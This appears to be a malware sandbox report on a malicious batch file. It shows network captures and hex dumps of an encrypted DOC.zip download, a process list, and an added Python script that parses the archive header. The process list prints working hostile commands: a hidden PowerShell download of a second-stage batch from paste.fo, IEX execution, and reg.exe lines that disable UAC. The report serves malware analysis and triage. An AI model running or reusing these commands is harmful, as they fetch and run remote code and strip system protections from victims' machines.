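Running `expand_batch(STAGE_TWO)` yields the two `reg.exe ADD HKLM\...\Policies\System /v EnableLUA ... /d 0 /f` lines that the process list records, while the same search over the unexpanded script text matches nothing; that gap is the reason to run the resolver before pattern-matching a dropped batch file.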


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                1 | 192.168.2.4 | 49731 | 185.199.111.133 | 443 | 7408 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-12-30 10:40:28 UTC | 711 | OUT | GET /knkbkk212/knkbkk212/refs/heads/main/DOC.zip HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Upgrade-Insecure-Requests: 1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: navigate
                                                                                Sec-Fetch-User: ?1
                                                                                Sec-Fetch-Dest: document
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-12-30 10:40:28 UTC | 893 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 1259880
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: application/zip
                                                                                ETag: "ea8fe7b750610985a05d1f0e28f9fd40a685d7a16e37755a1863e05428e5222c"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: AA1B:F2CE2:191194:1C9E8E:6772788F
                                                                                Accept-Ranges: bytes
                                                                                Date: Mon, 30 Dec 2024 10:40:28 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-nyc-kteb1890020-NYC
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1735555228.221529,VS0,VE114
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: fef646c2874f2082ab57f4aea43a39b9aa73ca0d
                                                                                Expires: Mon, 30 Dec 2024 10:45:28 GMT
                                                                                Source-Age: 0
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 50 4b 03 04 2d 00 09 08 08 00 27 34 7e 59 e5 37 d6 03 ff ff ff ff ff ff ff ff 07 00 14 00 44 4f 43 2e 65 78 65 01 00 10 00 00 64 1a 00 00 00 00 00 b8 38 13 00 00 00 00 00 99 a5 aa 98 1f b6 ad 40 a8 17 47 90 3c fc 75 26 b2 f5 68 ed 56 a5 a8 34 04 e5 2b 08 71 27 3d 44 7c 55 5b 34 42 24 f7 1b f4 89 9f 77 3c 48 0f fb 27 e6 fe 8c 0e 96 8c fc df b7 8d a8 ae cd 6b 44 43 9d 36 cf 78 e2 4c 2d 2e b0 7d 81 5c 1d fa 95 41 ce aa 5b e4 99 98 c6 dd d5 56 fa 50 f5 52 9f 8d ec 69 ae 71 c4 a8 18 13 4a 47 c5 67 0d f2 4a be 28 5d b8 41 ed da cb 50 2d 9b 0a a0 1d 0e 23 88 cb 50 54 3a 25 b5 f9 fc 34 f2 c6 f5 e8 6f 1e 55 de 82 84 90 46 dc 74 91 64 cc 76 96 19 78 62 f4 bf 30 7f e5 bf 69 5a 34 62 b1 7a 0a 4b d0 98 50 0b f4 ad 55 bd fa 65 9a d7 78 a5 85 e4 f9 99 fc 19 26 8d c4 3a
                                                                                Data Ascii: PK-'4~Y7DOC.exed8@G<u&hV4+q'=D|U[4B$w<H'kDC6xL-.}\A[VPRiqJGgJ(]AP-#PT:%4oUFtdvxb0iZ4bzKPUex&:
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 38 89 9a 4a 1a be 2d 4a 68 29 bc 08 00 28 d3 a1 0b 06 86 b6 45 43 22 30 59 99 46 21 91 67 de 78 58 d4 18 c7 30 d9 4f c6 7d b1 4c da a4 96 c6 01 f4 98 3d b1 b3 b4 fd c5 b1 d4 e2 9b 70 e9 e6 cf 11 b5 80 ad e2 9c e2 06 8d 9c 74 2c ca 44 e0 04 dd 3a d2 d0 9f 18 41 df dd f4 ca b5 3d 98 6b 1d a4 1e 11 6f 69 ce 79 16 5c be 55 e3 44 68 11 ef 80 44 b1 07 15 09 53 f1 ab 52 02 da 59 24 d4 65 da 96 42 01 72 70 46 a2 c3 b4 f3 3d cf 15 91 5c 85 d8 35 e6 05 e2 6d 45 74 65 ff 78 7e b5 5d 28 be 63 84 c9 76 cd 05 2a 41 3a de d7 5c b9 35 ce bb 01 a9 46 74 07 c2 a2 7b c8 33 c7 ec db 3b 57 1f 49 04 09 bd 1b de 6d d1 a9 a1 23 12 4c 71 3d e3 47 1b 68 00 3c ef 8f 1e a4 af 1e 15 33 89 9c b5 5d b1 45 66 e1 67 41 44 c4 a2 0f 23 62 bf 98 b5 5e 2d 9f bd 0e 5f a4 a7 52 fe 90 a1 a3 09
                                                                                Data Ascii: 8J-Jh)(EC"0YF!gxX0O}L=pt,D:A=koiy\UDhDSRY$eBrpF=\5mEtex~](cv*A:\5Ft{3;WIm#Lq=Gh<3]EfgAD#b^-_R
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: cf 81 cb a1 ab 6a 05 04 73 ac 8b 3a aa 40 83 ad 4b 5e 41 af eb 9d 63 4b 99 12 a2 55 1c e7 97 b7 cd 31 4c ea 14 54 91 93 19 89 b5 cc ff c8 22 67 98 3a 5d 79 c3 9c 65 93 c1 48 ec 51 c4 3a 68 4d 37 c3 7d 60 4a a3 31 d1 d9 40 11 c7 88 64 87 23 15 53 da fd 1d c6 54 40 10 b2 8e 58 00 5b 5d c9 4b 3c b4 77 b3 6c 71 c1 af c4 f0 0a 3b d3 e2 2f ae 47 f1 25 58 5f 43 35 9e 46 6b 0c 87 25 41 e5 59 8e 75 64 f9 77 ad fb 83 29 85 c5 15 0d eb 87 5c d9 bf 54 6f 4e 27 f6 f4 ff 5d 19 a7 b5 c2 c6 b0 d1 2d ab a3 51 88 89 94 4c f2 e1 36 9c 3a 56 c5 bc e9 87 2a a3 97 6c 54 7c 14 ac 69 50 c0 ae 68 eb 87 cd bf 21 88 d8 62 5a 78 59 5b 9c f6 c7 1e 2f 95 60 76 55 b9 07 fe 91 99 d2 69 44 be 69 df 5e 77 ee aa 4c e2 87 d5 db 45 35 eb 84 4c f3 3e 20 2a dc c6 2d ba 39 7c 1c cd 23 b8 e8 b6
                                                                                Data Ascii: js:@K^AcKU1LT"g:]yeHQ:hM7}`J1@d#ST@X[]K<wlq;/G%X_C5Fk%AYudw)\ToN']-QL6:V*lT|iPh!bZxY[/`vUiDi^wLE5L> *-9|#
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 1d e1 70 84 66 da 56 4d cf 05 21 0b 0c 44 a7 01 6a 99 a8 29 8d cb 20 ec b6 8b ba 71 a5 96 b9 9e 67 39 15 68 2a 35 11 50 13 5a 0e 3b d4 5c b0 5f 95 aa 75 01 d1 31 19 bc 7d 79 7a 2e c6 c8 d2 4c f6 fe 8d e0 87 c0 2c 52 dc f6 fa c6 a9 5b 5f 67 80 14 b1 7d ec ba 96 79 87 ca ec 27 01 f6 34 4c a3 b0 b2 bb 92 68 55 f3 60 c1 f7 39 30 25 74 f7 78 1e 75 e8 af f9 b1 3c 63 3a 34 81 1a 6a 75 65 2a 72 ae 69 84 97 a3 9b 4f d1 a1 b8 d3 0d d2 3e de 8b 45 5c 50 fb 2f 72 ef 98 13 3a f7 f4 27 40 d0 00 00 46 af ed 36 fd 50 8d c8 56 e1 19 58 53 8a f3 9d 7d 89 66 52 7f 1f 08 c9 df 3f 3f 11 49 fd a1 dc e3 65 42 c2 67 9e 0b e1 b2 9e ed a7 a6 30 37 4a 7b dc e0 c0 83 81 07 56 fa 5b 0a 18 c9 75 2b 57 3a cb 06 3b e3 a4 77 02 5a 5b 1b 60 c1 ad 0a 14 51 12 04 8e 3d 48 88 45 74 70 cf 33
                                                                                Data Ascii: pfVM!Dj) qg9h*5PZ;\_u1}yz.L,R[_g}y'4LhU`90%txu<c:4jue*riO>E\P/r:'@F6PVXS}fR??IeBg07J{V[u+W:;wZ[`Q=HEtp3
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 27 c5 c7 25 c2 4d 1f 52 ec d4 47 0e 20 f8 7d 08 87 70 41 73 f7 b0 cf bc 02 b9 97 20 d5 b0 01 3f d0 65 d6 f5 af 1b 7b e3 b4 8f ce 64 2f 6f 34 f0 64 fd f1 cf be fb 40 93 da e4 d8 12 c3 f8 7e e9 ce ea 8b 6a da 47 22 48 08 0b 7a de 1e d9 97 05 a0 52 77 2c 55 40 05 f8 ca 6b f8 5c e7 40 c7 b6 05 8e 68 bd b7 17 3a b3 f8 c0 39 40 a7 f8 48 f6 85 28 a8 d3 0c 32 d4 6f 4c 3c 6c 9a 35 2c a1 0b 85 ee 04 4b 6c b0 00 2c 52 3c b0 ba b0 20 e2 50 f4 21 79 45 ab c9 5c 27 ad 43 7b 65 8a ff 24 39 3d 6e c1 57 01 92 a0 7e ea 35 99 1f 6c fd 6f 8b db 5b f6 61 c1 6e 1f 25 8f 17 5b 0d 66 f4 70 53 9c 64 66 63 e7 37 93 20 e1 a9 53 ab 5a 65 01 87 81 50 f0 4d 01 9a fb 76 f0 5d fc 02 14 49 f9 1e c5 57 d8 a3 eb 1b 8f ea 55 14 b1 77 12 cb 6a eb 72 a3 09 e2 bf bd 15 ac 79 87 48 c0 94 5d 51
                                                                                Data Ascii: '%MRG }pAs ?e{d/o4d@~jG"HzRw,U@k\@h:9@H(2oL<l5,Kl,R< P!yE\'C{e$9=nW~5lo[an%[fpSdfc7 SZePMv]IWUwjryH]Q
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: ea e9 00 2b 7c 05 18 f0 11 a2 52 56 74 e2 cb 8e 6b ac 7c f7 ae 40 28 f2 d4 5d 02 41 5d fa 67 a9 a1 be 48 fb d8 4c 4b e2 01 a3 50 0d 4d 33 4c 14 bc 99 00 37 49 72 1b 64 c1 86 52 c2 96 1b d6 55 6b 1a a5 47 1d a1 23 bc 4c 84 bf 61 a6 c3 50 64 76 1c 5e ba 21 5f 95 23 56 c9 0b 48 7c 73 d6 c9 4c e2 3c 85 3e 26 ca e8 2c 48 58 43 a2 41 f4 f5 a8 8d ac d9 6f 2b 09 df 0d 44 c9 7e 8d b0 7a 97 82 b5 a2 8f 73 62 a9 4d e2 8a bb e8 b6 e3 cc fb e9 74 70 17 83 1b c1 b0 e5 eb d7 7f eb 44 52 05 aa c5 99 a5 a9 7a 59 a3 f1 bc 8d 9f d8 8c c9 7c eb 85 4e f2 b7 0d 8b a1 e2 bf 7a ec d7 7a fc c4 60 1e 94 39 10 01 7c bb 6c e0 89 7d 65 8f 87 a7 f5 63 83 f9 a2 ba b0 e1 6d e9 dd e2 4a 54 fd 09 b3 bd 7d 98 20 29 c5 ad 0a aa 53 b1 82 a5 88 a0 cc d2 6f 61 85 1b 2d 83 7d 29 21 bd 1e 64 75
                                                                                Data Ascii: +|RVtk|@(]A]gHLKPM3L7IrdRUkG#LaPdv^!_#VH|sL<>&,HXCAo+D~zsbMtpDRzY|Nzz`9|l}ecmJT} )Soa-})!du
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 06 1a 90 60 90 98 50 82 0b 0e 9c 6c af cc fc 8c a5 10 31 58 57 54 72 5e 32 01 82 93 1e a6 8b d9 ee a3 3a b2 db 99 a2 bb de 3b 04 48 72 ac 0a 84 d2 92 55 53 ee 0b e8 6a a8 9c b2 9b 57 f6 99 29 6a 29 a9 97 ec 12 bb b2 41 79 b1 74 03 a2 9a 3d 76 e5 45 c3 42 5a eb 1c 17 48 c5 f5 31 ca bd db a6 41 00 1c e7 a7 01 56 a7 53 50 9e f4 ab 08 3d aa 03 37 59 86 03 9e fe bb 5a d2 9c c9 77 f0 68 07 9f 03 1c ac b5 49 a0 28 ec 7c 7d 9a 4c ca c0 dd 8a bf e7 87 f9 8b c5 ca 20 93 a7 16 e3 9e 07 9c 83 67 eb 81 99 89 a5 17 cf 0d 62 7c dd 05 72 f0 d6 37 bd f7 fb ec ec 72 a2 6f f4 c5 0f 83 52 c7 29 b5 56 67 45 25 b8 61 4d 6c a4 be b8 49 e7 ff a5 04 20 77 22 32 da e4 87 75 0f 76 32 a6 1b cd 06 41 c8 5b 4c 5f 60 fb 30 f7 bb aa ae 8e 51 86 e9 1d cf fb eb 9c b0 5b 9b ab 5e d0 ee 00
                                                                                Data Ascii: `Pl1XWTr^2:;HrUSjW)j)Ayt=vEBZH1AVSP=7YZwhI(|}L gb|r7roR)VgE%aMlI w"2uv2A[L_`0Q[^
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: b1 37 de 8d ef 64 e8 af 55 ed e8 b9 5c 7e 63 bd e6 a9 6d 42 59 70 e2 d5 ee 7b 51 00 71 af 1d df c0 de 70 f4 ee fe 8b a9 75 3b dc 8f 68 7f 56 33 a1 e1 b7 de e9 2e fe f0 ec 3f 7c 6b bc 60 03 a9 87 5c e1 52 de dd 94 51 37 2d 14 f9 5e 92 69 9e 2a 36 ac 64 97 bc 28 80 99 a1 e6 81 3a b5 95 90 c3 d6 78 0d bb f5 53 2d 70 84 7a bf 26 a3 0c 8a 55 5a 8c d2 64 b1 92 4a 5c e3 d7 91 85 44 44 26 25 33 e7 21 6f 60 56 30 98 89 10 09 22 d6 76 0f fc 3d 75 af ba f4 e4 ed ef 4e 67 d4 00 91 12 a5 14 24 11 e2 d8 32 ed c4 85 96 90 3d 4a 9c 3f 94 69 df 07 7a d0 51 1f 5b bb 30 f9 c8 ce 87 e3 36 08 f9 da 3c 72 9a 7d af de 97 b2 97 46 ab 6e cc 45 04 9a 16 ba 37 80 0c ab cc 88 d9 1e 3e 85 2a 72 08 96 28 92 f7 ec 9a af 80 85 3d b3 74 e8 12 5f 1d 71 e6 ec 66 3d f5 49 c9 58 60 7b f1 9a
                                                                                Data Ascii: 7dU\~cmBYp{Qqpu;hV3.?|k`\RQ7-^i*6d(:xS-pz&UZdJ\DD&%3!o`V0"v=uNg$2=J?izQ[06<r}FnE7>*r(=t_qf=IX`{
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 5b f0 fc 06 28 83 45 29 09 8c 98 dc db 7e a0 db 13 93 bd d3 0f 3e 74 45 8a cb b5 b9 df 8f 71 37 25 fd 2f a9 a8 5d 86 83 54 d5 9b d2 dc f7 3c 71 44 75 31 dc 52 cf 80 13 a7 3f b0 ef 00 99 bf 1b 21 d5 de 3c c3 70 0d 68 d5 3a ee 08 16 20 3d 7c 43 6a fb 3d be c0 ac cf 8d 3d 1b 06 4f fc a8 f7 e8 32 87 fb 95 cf 8b 4e 73 6c d3 41 cc 9c ac c9 c4 6d 42 d7 d8 33 ec a1 39 b6 98 34 99 6f 7c 9e b1 0f b2 72 d0 f7 b6 53 66 c3 22 cf 4c c5 87 5d fe 49 a6 17 d4 01 e8 48 35 3c 01 dd fb fb db 86 20 e8 ad 68 7e b4 5d 6b 57 55 e7 a3 91 cf 30 82 62 b9 3c e1 53 9d 38 99 5d 03 e2 31 7a 4b ad a0 62 ed 0c 0f 00 c9 40 26 79 84 ec 4f e5 3b 80 50 45 60 6f 48 49 51 6f ff 47 6d 92 6f c9 aa c4 74 b9 fa 00 06 0e 24 e5 b0 52 17 3e 31 2a 7c b5 ea fa 23 92 9d 73 f6 e5 e9 a7 1b f8 85 f1 5f 78
                                                                                Data Ascii: [(E)~>tEq7%/]T<qDu1R?!<ph: =|Cj==O2NslAmB394o|rSf"L]IH5< h~]kWU0b<S8]1zKb@&yO;PE`oHIQoGmot$R>1*|#s_x
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: f0 9c 08 93 e0 25 91 22 fc 65 6e a3 d5 47 24 ce 68 2e 5e 82 63 a1 d1 ae 21 df e2 4e 6f 68 7b 9c 90 d4 3e 09 02 a9 8e d5 ba ae 30 3a 3b 2c da 5f 60 3c 43 d3 7f 0d 23 29 60 ad cf 30 22 21 8a 28 2f fb 3e 96 c6 b7 f2 fd a1 c5 ec c7 b4 a4 1d b5 f4 91 fa 4b 5d 0e 32 93 ed 19 37 64 bb 69 97 4d 69 ef 54 d2 c1 ac 89 e3 39 7a 97 e1 74 b5 e6 08 e4 fa 32 c1 dd 0c ac 9b c1 c0 0b c8 2b 4a 5f 13 cf 6e 64 fb e3 e7 24 9f 62 7d eb 70 f5 06 19 25 b5 d5 9b 9e b9 a8 96 37 69 46 77 ce 9b ff 68 82 a3 4f 70 67 07 80 29 43 a0 36 3f dc 94 8a 1c 3d 0e b2 09 e8 25 46 8b b2 63 8f 80 34 0d f8 71 70 bc 36 6e 08 b4 c9 2b 5d bc 93 7c f2 ab 7f 95 4b a5 ae c6 b0 c1 eb 92 50 25 ff 89 44 1b 18 a7 d6 0f d8 5f 44 6a 84 c7 df 85 83 2e 32 ae 48 7b 5f 6c 99 c7 aa 3f a0 0b 59 04 a4 ff 23 55 8e 1f
                                                                                Data Ascii: %"enG$h.^c!Noh{>0:;,_`<C#)`0"!(/>K]27diMiT9zt2+J_nd$b}p%7iFwhOpg)C6?=%Fc4qp6n+]|KP%D_Dj.2H{_l?Y#U
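The DOC.zip body above opens with a local file header whose general-purpose flag word is 0x0809; bit 0 of it is the encryption flag, which is what the "Drops password protected ZIP file" signature reports. Everything a triager needs can be read from the Data Raw bytes: the entry is DOC.exe, deflate-compressed, with the real sizes carried in a zip64 extra field and no AES extra field (0x9901), so the protection is legacy PKWARE ZipCrypto, a scheme with a well-known known-plaintext attack; the password itself has to be supplied by the dropper, which is the point of the wrapper, since a proxy or scanner that sees only the archive cannot open it. The Python below is an added example, not part of the report: it parses that header, decodes the DOS timestamp, and checks the sizes against the Content-Length the server announced. The header bytes are copied from the report's record; the 20-byte zip64 extra assumed for the central-directory record is labelled in the code.

```python
"""Triage the local file header of DOC.zip from the report's hex dump.
Added example; not part of the Joe Sandbox report."""
import struct

# Leading bytes of the DOC.zip response body, copied from the report's first
# Data Raw record: fixed header, name, zip64 extra, start of the encrypted data.
DOC_ZIP_PREFIX = bytes.fromhex(
    "50 4b 03 04 2d 00 09 08 08 00 27 34 7e 59 e5 37 d6 03 ff ff ff ff ff ff ff ff "
    "07 00 14 00 44 4f 43 2e 65 78 65 01 00 10 00 00 64 1a 00 00 00 00 00 b8 38 13 00 "
    "00 00 00 00 99 a5 aa 98 1f b6 ad 40 a8 17 47 90 3c fc 75 26 b2 f5 68 ed 56 a5 a8 34 "
)
CONTENT_LENGTH = 1259880          # from the raw.githubusercontent.com response

LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")   # the 30 fixed bytes
ZIP64_EXTRA_ID = 0x0001
AES_EXTRA_ID = 0x9901


def dos_datetime(mdate, mtime):
    """MS-DOS packed date/time (2-second resolution, packer-local clock)."""
    year, month, day = (mdate >> 9) + 1980, (mdate >> 5) & 0xF, mdate & 0x1F
    hour, minute, second = mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2
    return "%04d-%02d-%02d %02d:%02d:%02d" % (year, month, day, hour, minute, second)


def parse_local_header(buf):
    """Parse the first local file header in buf and return the fields that
    matter for triage: name, encryption (and which kind), compression method,
    timestamp and the true sizes (zip64-aware)."""
    (sig, version, flags, method, mtime, mdate, crc,
     csize, usize, name_len, extra_len) = LOCAL_HEADER.unpack_from(buf, 0)
    if sig != b"PK\x03\x04":
        raise ValueError("not a local file header")
    name_raw = buf[30:30 + name_len]
    extra = buf[30 + name_len:30 + name_len + extra_len]
    info = {
        "name": name_raw.decode("utf-8" if flags & 0x800 else "cp437"),
        "encrypted": bool(flags & 0x1),
        "data_descriptor": bool(flags & 0x8),    # sizes/CRC repeated after the data
        "aes": False,
        "compression": method,                    # 8 = deflate, 0 = stored, 99 = AES wrapper
        "version_needed": version / 10,           # 4.5 = zip64 extensions in use
        "modified": dos_datetime(mdate, mtime),
        "crc32": crc,
        "csize": csize,
        "usize": usize,
        "name_len": name_len,
        "extra_len": extra_len,
    }
    off = 0
    while off + 4 <= len(extra):
        field_id, field_len = struct.unpack_from("<HH", extra, off)
        body = extra[off + 4:off + 4 + field_len]
        if field_id == ZIP64_EXTRA_ID:
            # 64-bit values are present only for fields set to 0xFFFFFFFF,
            # in the order uncompressed size, compressed size.
            vals = list(struct.unpack_from("<%dQ" % (len(body) // 8), body))
            if usize == 0xFFFFFFFF:
                info["usize"] = vals.pop(0)
            if csize == 0xFFFFFFFF:
                info["csize"] = vals.pop(0)
        elif field_id == AES_EXTRA_ID:
            info["aes"] = True
        off += 4 + field_len
    if info["aes"]:
        info["encryption"] = "AES (WinZip)"
    elif info["encrypted"]:
        info["encryption"] = "ZipCrypto (legacy PKWARE)"
    else:
        info["encryption"] = "none"
    return info


def single_entry_archive_size(info):
    """Size the archive would have if this were its only entry: local header
    + name + extra + compressed data + zip64 data descriptor (24 bytes,
    announced by flag bit 3) + one central-directory record + the 22-byte
    end-of-central-directory record. Assumption: the central record carries
    the 20-byte zip64 extra (both sizes, no offset), the usual form when the
    entry offset fits in 32 bits."""
    local = 30 + info["name_len"] + info["extra_len"] + info["csize"]
    descriptor = 24 if info["data_descriptor"] else 0
    central = 46 + info["name_len"] + 20
    return local + descriptor + central + 22
```

With these bytes the arithmetic closes exactly: 1259704 bytes of compressed data plus 176 bytes of container equal the 1259880 bytes in the Content-Length header, which is consistent with an archive that holds DOC.exe (1729536 bytes unpacked, packed on 2024-11-30 by the packer's clock) and nothing else.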


                                                                                Target ID:0
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" "
                                                                                Imagebase:0x7ff637190000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat"
                                                                                Imagebase:0x7ff637190000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:05:40:09
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:05:40:20
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
                                                                                Imagebase:0x7ff637190000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:9
                                                                                Start time:05:40:22
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:05:40:23
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:05:40:23
                                                                                Start date:30/12/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
                                                                                Imagebase:0x7ff76e190000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:timeout /t 9
                                                                                Imagebase:0x7ff69e930000
                                                                                File size:32'768 bytes
